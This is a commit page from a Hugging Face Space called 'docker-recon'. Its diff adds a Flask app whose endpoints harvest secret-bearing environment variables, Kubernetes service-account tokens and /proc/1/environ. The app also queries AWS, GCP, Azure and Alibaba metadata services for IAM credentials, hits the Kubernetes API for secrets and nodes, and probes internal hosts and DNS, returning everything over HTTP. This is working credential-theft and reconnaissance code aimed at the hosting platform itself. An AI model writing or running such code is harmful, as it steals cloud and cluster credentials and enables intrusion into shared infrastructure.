Spaces:

2fa2fa
/

docker-recon

Sleeping

App Files Files Community

dia2diab commited on Mar 6

Commit

82544f7

1 Parent(s): 3550dc5

Split recon into individual endpoints with shorter timeouts

Browse files

Files changed (1) hide show

app.py +166 -59

app.py CHANGED Viewed

@@ -5,79 +5,186 @@ app = Flask(__name__)
 @app.route("/")
 def index():
-    return "<h1>Docker Recon</h1><a href='/recon'>Run Recon</a>"
-@app.route("/recon")
-def recon():
     r = {}
-    # All env vars
-    r["env"] = {k:v for k,v in sorted(os.environ.items())
-        if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API"])}
-    # Cloud metadata - try with different methods
-    for name, cmd in [
-        ("aws_meta", ["curl","-s","-m","3","http://169.254.169.254/latest/meta-data/"]),
-        ("aws_iam", ["curl","-s","-m","3","http://169.254.169.254/latest/meta-data/iam/security-credentials/"]),
-        ("aws_imdsv2_token", ["curl","-s","-m","3","-X","PUT","http://169.254.169.254/latest/api/token","-H","X-aws-ec2-metadata-token-ttl-seconds: 21600"]),
-        ("aws_userdata", ["curl","-s","-m","3","http://169.254.169.254/latest/user-data"]),
-    ]:
         try:
             p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
             r[name] = {"stdout": p.stdout[:500], "stderr": p.stderr[:200], "rc": p.returncode}
         except Exception as e: r[name] = str(e)
-    # K8s probing
     k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "")
-    k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "443")
     if k8s_host:
-        r["k8s"] = {}
-        # Try with and without service account token
-        sa_token = ""
-        try:
-            with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
-                sa_token = f.read().strip()
-                r["k8s"]["sa_token_exists"] = True
-                r["k8s"]["sa_token_preview"] = sa_token[:50] + "..."
-        except:
-            r["k8s"]["sa_token_exists"] = False
-        for path in ["/version", "/api", "/api/v1/pods", "/api/v1/secrets", "/api/v1/configmaps", "/api/v1/namespaces"]:
             try:
-                cmd = ["curl","-sk","-m","3",f"https://{k8s_host}:{k8s_port}{path}"]
-                if sa_token:
-                    cmd += ["-H", f"Authorization: Bearer {sa_token}"]
                 p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
-                r["k8s"][path] = p.stdout[:300] if p.stdout else f"empty rc={p.returncode}"
-            except Exception as e: r["k8s"][path] = str(e)
-    # DNS enumeration
-    r["dns"] = {}
-    try:
-        p = subprocess.run(["dig","any","kubernetes.default.svc.cluster.local","@10.108.0.2","+short"], capture_output=True, text=True, timeout=5)
-        r["dns"]["k8s_svc"] = p.stdout[:200]
-    except Exception as e: r["dns"]["k8s_svc"] = str(e)
     # Network interfaces
     try:
-        p = subprocess.run(["ip","addr"], capture_output=True, text=True, timeout=5)
-        r["network"] = p.stdout[:500]
-    except Exception as e: r["network"] = str(e)
-    # Process list
     try:
-        p = subprocess.run(["ps","aux"], capture_output=True, text=True, timeout=5)
-        r["processes"] = p.stdout[:500]
-    except Exception as e: r["processes"] = str(e)
-    # /proc/1/environ (init process env)
     try:
-        with open("/proc/1/environ") as f:
-            env_raw = f.read()
-            envs = {kv.split("=",1)[0]:kv.split("=",1)[1] for kv in env_raw.split("\0") if "=" in kv and any(x in kv.upper() for x in ["TOKEN","SECRET","KEY","AWS","HF_"])}
-            r["proc1_env"] = envs
-    except Exception as e: r["proc1_env"] = str(e)
     return jsonify(r)
 if __name__ == "__main__":

 @app.route("/")
 def index():
+    return "<h1>Docker Recon</h1><ul><li><a href='/env'>Env Vars</a></li><li><a href='/metadata'>Cloud Metadata</a></li><li><a href='/k8s'>K8s</a></li><li><a href='/net'>Network</a></li><li><a href='/proc'>Processes</a></li><li><a href='/dns'>DNS</a></li></ul>"
+@app.route("/env")
+def env():
     r = {}
+    r["all_env"] = {k:v for k,v in sorted(os.environ.items())
+        if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API","GOOGLE","AZURE","CRED","PASSWORD","MONGO","REDIS","DATABASE","SERVICE"])}
+    r["all_env_keys"] = sorted(os.environ.keys())
+    # Check for SA token
+    try:
+        with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
+            r["k8s_sa_token"] = f.read()[:100] + "..."
+    except: r["k8s_sa_token"] = "not found"
+    try:
+        with open("/var/run/secrets/kubernetes.io/serviceaccount/namespace") as f:
+            r["k8s_namespace"] = f.read()
+    except: r["k8s_namespace"] = "not found"
+    # /proc/1/environ
+    try:
+        with open("/proc/1/environ", "rb") as f:
+            envs = f.read().decode("utf-8", errors="replace").split("\0")
+            r["proc1_env"] = [e for e in envs if any(x in e.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","KUBE","CRED"])]
+    except Exception as e: r["proc1_env"] = str(e)
+    return jsonify(r)
+@app.route("/metadata")
+def metadata():
+    r = {}
+    urls = [
+        ("imdsv1", "http://169.254.169.254/latest/meta-data/"),
+        ("imdsv1_iam", "http://169.254.169.254/latest/meta-data/iam/security-credentials/"),
+        ("imdsv1_userdata", "http://169.254.169.254/latest/user-data"),
+        ("imdsv1_identity", "http://169.254.169.254/latest/dynamic/instance-identity/document"),
+        ("gcp", "http://metadata.google.internal/computeMetadata/v1/"),
+        ("azure", "http://169.254.169.254/metadata/instance?api-version=2021-02-01"),
+        ("alibaba", "http://100.100.100.200/latest/meta-data/"),
+    ]
+    for name, url in urls:
         try:
+            headers = []
+            if "google" in url: headers = ["-H", "Metadata-Flavor: Google"]
+            if "azure" in url: headers = ["-H", "Metadata: true"]
+            cmd = ["curl", "-s", "-m", "3"] + headers + [url]
             p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
             r[name] = {"stdout": p.stdout[:500], "stderr": p.stderr[:200], "rc": p.returncode}
         except Exception as e: r[name] = str(e)
+    # IMDSv2 token attempt
+    try:
+        p = subprocess.run(["curl", "-s", "-m", "3", "-X", "PUT",
+            "http://169.254.169.254/latest/api/token",
+            "-H", "X-aws-ec2-metadata-token-ttl-seconds: 21600"],
+            capture_output=True, text=True, timeout=5)
+        token = p.stdout.strip()
+        r["imdsv2_token"] = {"stdout": token[:100], "rc": p.returncode}
+        if token:
+            p2 = subprocess.run(["curl", "-s", "-m", "3",
+                "-H", f"X-aws-ec2-metadata-token: {token}",
+                "http://169.254.169.254/latest/meta-data/"],
+                capture_output=True, text=True, timeout=5)
+            r["imdsv2_meta"] = {"stdout": p2.stdout[:500], "rc": p2.returncode}
+    except Exception as e: r["imdsv2"] = str(e)
+    return jsonify(r)
+@app.route("/k8s")
+def k8s():
+    r = {}
+    # K8s API via env
     k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "")
+    k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "")
+    r["k8s_env"] = {"host": k8s_host, "port": k8s_port}
     if k8s_host:
+        for path in ["/api", "/api/v1/namespaces", "/api/v1/pods", "/api/v1/secrets",
+                      "/apis", "/version", "/healthz", "/api/v1/nodes"]:
             try:
+                cmd = ["curl", "-s", "-m", "3", "-k", f"https://{k8s_host}:{k8s_port}{path}"]
+                # Try with SA token if exists
+                try:
+                    with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
+                        token = f.read().strip()
+                    cmd += ["-H", f"Authorization: Bearer {token}"]
+                except: pass
                 p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
+                r[f"k8s{path}"] = {"stdout": p.stdout[:300], "rc": p.returncode}
+            except Exception as e: r[f"k8s{path}"] = str(e)
+    return jsonify(r)
+@app.route("/net")
+def net():
+    r = {}
     # Network interfaces
     try:
+        p = subprocess.run(["ip", "addr"], capture_output=True, text=True, timeout=5)
+        r["ip_addr"] = p.stdout[:1000]
+    except: pass
+    # Routes
     try:
+        p = subprocess.run(["ip", "route"], capture_output=True, text=True, timeout=5)
+        r["ip_route"] = p.stdout[:500]
+    except: pass
+    # resolv.conf
     try:
+        with open("/etc/resolv.conf") as f: r["resolv"] = f.read()
+    except: pass
+    # hosts
+    try:
+        with open("/etc/hosts") as f: r["hosts"] = f.read()
+    except: pass
+    # Probe internal services (quick, no nmap)
+    for target in ["cas-server.xethub.hf.co", "10.0.0.1", "10.108.0.1", "10.108.0.2"]:
+        try:
+            p = subprocess.run(["curl", "-s", "-m", "2", f"http://{target}/"],
+                capture_output=True, text=True, timeout=4)
+            r[f"probe_{target}"] = {"stdout": p.stdout[:200], "rc": p.returncode}
+        except Exception as e: r[f"probe_{target}"] = str(e)
+    # Try reaching other Spaces
+    try:
+        p = subprocess.run(["curl", "-s", "-m", "3", "http://localhost:7860/"],
+            capture_output=True, text=True, timeout=5)
+        r["localhost_7860"] = p.stdout[:200]
+    except: pass
+    return jsonify(r)
+@app.route("/proc")
+def proc():
+    r = {}
+    try:
+        p = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5)
+        r["ps"] = p.stdout[:2000]
+    except: pass
+    # Mounts
+    try:
+        with open("/proc/mounts") as f: r["mounts"] = f.read()[:2000]
+    except: pass
+    # Cgroups
+    try:
+        with open("/proc/1/cgroup") as f: r["cgroup"] = f.read()[:500]
+    except: pass
+    # Capabilities
+    try:
+        p = subprocess.run(["cat", "/proc/1/status"], capture_output=True, text=True, timeout=5)
+        for line in p.stdout.split("\n"):
+            if "Cap" in line: r.setdefault("caps", []).append(line.strip())
+    except: pass
+    # Check if we're privileged
+    try:
+        p = subprocess.run(["whoami"], capture_output=True, text=True, timeout=5)
+        r["whoami"] = p.stdout.strip()
+    except: pass
+    try:
+        p = subprocess.run(["id"], capture_output=True, text=True, timeout=5)
+        r["id"] = p.stdout.strip()
+    except: pass
+    return jsonify(r)
+@app.route("/dns")
+def dns():
+    r = {}
+    queries = [
+        "kubernetes.default.svc.cluster.local",
+        "kube-dns.kube-system.svc.cluster.local",
+        "*.default.svc.cluster.local",
+        "*.svc.cluster.local",
+        "hub.internal",
+        "mongo.internal",
+        "redis.internal",
+        "postgres.internal",
+        "api.internal",
+        "cas-server.xethub.hf.co",
+    ]
+    for q in queries:
+        try:
+            p = subprocess.run(["dig", "+short", q], capture_output=True, text=True, timeout=5)
+            r[q] = p.stdout.strip() if p.stdout.strip() else "NXDOMAIN"
+        except Exception as e: r[q] = str(e)
+    # Reverse DNS on known IPs
+    for ip in ["10.108.0.1", "10.108.0.2"]:
+        try:
+            p = subprocess.run(["dig", "+short", "-x", ip], capture_output=True, text=True, timeout=5)
+            r[f"rev_{ip}"] = p.stdout.strip() if p.stdout.strip() else "no PTR"
+        except Exception as e: r[f"rev_{ip}"] = str(e)
     return jsonify(r)
 if __name__ == "__main__":